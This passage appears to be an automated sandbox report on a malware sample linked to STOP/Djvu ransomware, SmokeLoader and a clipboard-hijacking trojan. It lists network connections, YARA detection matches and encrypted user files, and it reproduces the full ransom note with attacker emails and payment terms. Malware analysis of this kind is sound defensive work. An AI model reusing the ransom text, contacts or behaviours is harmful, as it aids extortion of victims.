Source: explorer.exe, 00000001.00000000.1688547736.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
Source: explorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
Source: explorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
Source: explorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
Source: explorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: explorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
Source: explorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe
Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: build2.exe, 00000013.00000003.2122792993.0000000000843000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com
Source: build2.exe, 00000013.00000003.2122792993.0000000000843000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49814
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49809
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49800
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49809 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49751 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49755 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 103.174.152.66:443 -> 192.168.2.4:49756 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.42.29:443 -> 192.168.2.4:49762 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 65.109.242.59:443 -> 192.168.2.4:49765 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49772 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 192.185.16.114:443 -> 192.168.2.4:49773 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49785 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.196.109.209:443 -> 192.168.2.4:49803 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.4:49812 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected SmokeLoader

Source: Yara match	File source: 00000004.00000002.1982678563.0000000002EF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.2343916720.0000000002E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.2344075429.0000000002E71000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1710632872.00000000048F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1982993082.00000000048F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1710474391.00000000048D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\AppData\Local\Temp\E609.exe

Code function: 10_2_004822E0 CreateDCA,CreateCompatibleDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,SelectObject,GetObjectA,BitBlt,GetBitmapBits,SelectObject,DeleteObject,DeleteDC,DeleteDC,DeleteDC,

10_2_004822E0

Spam, unwanted Advertisements and Ransom Demands

Found ransom note / readme

Source: C:\_readme.txt

Dropped file: ATTENTION!Don't worry, you can return all your files!All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.The only method of recovering files is to purchase decrypt tool and unique key for you.This software will decrypt all your encrypted files.What guarantees you have?You can send one of your encrypted file from your PC and we decrypt it for free.But we can decrypt only 1 file for free. File must not contain valuable information.Do not ask assistants from youtube and recovery data sites for help in recovering your data.They can use your free decryption quota and scam you.Our contact is emails in this text document only.You can get and look video overview decrypt tool:https://wetransfer.com/downloads/33b490a613f49fa190924f199d2c079e20240512191214/caaf73Price of private key and decrypt software is $999.Discount 50% available if you contact us first 72 hours, that's price for you is $499.Please note that you'll never restore your data without payment.Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours.To get this software you need write on our e-mail:support@freshingmail.topReserve e-mail address to contact us:datarestorehelpyou@airmail.ccYour personal ID:0871PsawqSSLibyJ8nZP43K8X6Ycor9IxvOlsKHVTLIpW2nQ4P

Jump to dropped file

Yara detected Babuk Ransomware

Source: Yara match	File source: Process Memory Space: E609.exe PID: 2764, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: E609.exe PID: 5436, type: MEMORYSTR

Yara detected Djvu Ransomware

Source: Yara match	File source: 9.2.E609.exe.4a115a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.E609.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.E609.exe.4a715a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.E609.exe.4a815a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.E609.exe.4a715a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.E609.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.E609.exe.49e15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.E609.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.E609.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.E609.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.E609.exe.4a815a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.E609.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.E609.exe.4a115a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.E609.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.E609.exe.4a715a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.E609.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.E609.exe.4a715a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.E609.exe.49e15a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.E609.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.E609.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001F.00000002.2266971281.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2873470043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2060401394.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2211120304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.2186742765.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.2275243210.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2077051792.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: E609.exe PID: 6956, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: E609.exe PID: 7048, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: E609.exe PID: 2844, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: E609.exe PID: 2764, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: E609.exe PID: 5688, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: E609.exe PID: 5436, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: E609.exe PID: 6008, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: E609.exe PID: 3128, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: E609.exe PID: 916, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: E609.exe PID: 4956, type: MEMORYSTR

Modifies existing user documents (likely ransomware behavior)

Source: C:\Users\user\AppData\Local\Temp\E609.exe	File moved: C:\Users\user\Desktop\XZXHAVGRAG\UMMBDNEQBN.xlsx	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	File deleted: C:\Users\user\Desktop\XZXHAVGRAG\UMMBDNEQBN.xlsx	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	File moved: C:\Users\user\Desktop\AIXACVYBSB\XZXHAVGRAG.pdf	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	File deleted: C:\Users\user\Desktop\AIXACVYBSB\XZXHAVGRAG.pdf	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	File moved: C:\Users\user\Desktop\DTBZGIOOSO\ONBQCLYSPU.xlsx	Jump to behavior

Writes a notice file (html or txt) to demand a ransom

Source: C:\Users\user\AppData\Local\Temp\E609.exe	File dropped: C:\_readme.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.do not ask assistants from youtube and recovery data sites for help in recovering your data.they can use your free decryption quota and scam you.our contact is emails in this text document only.you can get and look video overview decrypt tool:https://wetransfer.com/downloads/33b490a613f49fa190924f199d2c079e20240512191214/caaf73price of private key and decrypt software is $999.discount 50% available if you contact us first 72 hours, that's price for you is $499.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@freshingmail.topreserve e-mail address	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\E609.exe	File dropped: C:\$WinREAgent\_readme.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.do not ask assistants from youtube and recovery data sites for help in recovering your data.they can use your free decryption quota and scam you.our contact is emails in this text document only.you can get and look video overview decrypt tool:https://wetransfer.com/downloads/33b490a613f49fa190924f199d2c079e20240512191214/caaf73price of private key and decrypt software is $999.discount 50% available if you contact us first 72 hours, that's price for you is $499.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@freshingmail.topreserve e-mail address	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\E609.exe	File dropped: C:\$WinREAgent\Scratch\_readme.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.do not ask assistants from youtube and recovery data sites for help in recovering your data.they can use your free decryption quota and scam you.our contact is emails in this text document only.you can get and look video overview decrypt tool:https://wetransfer.com/downloads/33b490a613f49fa190924f199d2c079e20240512191214/caaf73price of private key and decrypt software is $999.discount 50% available if you contact us first 72 hours, that's price for you is $499.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@freshingmail.topreserve e-mail address	Jump to dropped file
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	File dropped: C:\Users\user\AppData\Local\VirtualStore\_readme.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.do not ask assistants from youtube and recovery data sites for help in recovering your data.they can use your free decryption quota and scam you.our contact is emails in this text document only.you can get and look video overview decrypt tool:https://wetransfer.com/downloads/33b490a613f49fa190924f199d2c079e20240512191214/caaf73price of private key and decrypt software is $999.discount 50% available if you contact us first 72 hours, that's price for you is $499.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@freshingmail.topreserve e-mail address	Jump to dropped file
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	File dropped: C:\Users\user\_readme.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.do not ask assistants from youtube and recovery data sites for help in recovering your data.they can use your free decryption quota and scam you.our contact is emails in this text document only.you can get and look video overview decrypt tool:https://wetransfer.com/downloads/33b490a613f49fa190924f199d2c079e20240512191214/caaf73price of private key and decrypt software is $999.discount 50% available if you contact us first 72 hours, that's price for you is $499.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@freshingmail.topreserve e-mail address	Jump to dropped file

System Summary

Malicious sample detected (through community Yara rule)

Source: 32.2.mstsca.exe.8a15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 32.2.mstsca.exe.8a15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 35.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 35.2.mstsca.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 26.2.build3.exe.9715a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 26.2.build3.exe.9715a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 35.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 35.2.mstsca.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 28.2.build3.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 28.2.build3.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 28.2.build3.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 28.2.build3.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 26.2.build3.exe.9715a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 26.2.build3.exe.9715a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 32.2.mstsca.exe.8a15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 32.2.mstsca.exe.8a15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 19.2.build2.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 18.2.build2.exe.2d915a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 9.2.E609.exe.4a115a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.2.E609.exe.4a115a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 33.2.E609.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 33.2.E609.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 19.2.build2.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 14.2.E609.exe.4a715a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 14.2.E609.exe.4a715a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 31.2.E609.exe.4a815a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 31.2.E609.exe.4a815a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 25.2.E609.exe.4a715a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 25.2.E609.exe.4a715a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 15.2.E609.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 15.2.E609.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 18.2.build2.exe.2d915a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 16.2.E609.exe.49e15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 16.2.E609.exe.49e15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 33.2.E609.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 33.2.E609.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 10.2.E609.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 10.2.E609.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 17.2.E609.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 17.2.E609.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 31.2.E609.exe.4a815a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 31.2.E609.exe.4a815a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 10.2.E609.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 10.2.E609.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.2.E609.exe.4a115a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.2.E609.exe.4a115a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 17.2.E609.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 17.2.E609.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 14.2.E609.exe.4a715a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 14.2.E609.exe.4a715a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 27.2.E609.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 27.2.E609.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 25.2.E609.exe.4a715a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 25.2.E609.exe.4a715a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 16.2.E609.exe.49e15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 16.2.E609.exe.49e15a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 15.2.E609.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 15.2.E609.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 27.2.E609.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 27.2.E609.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
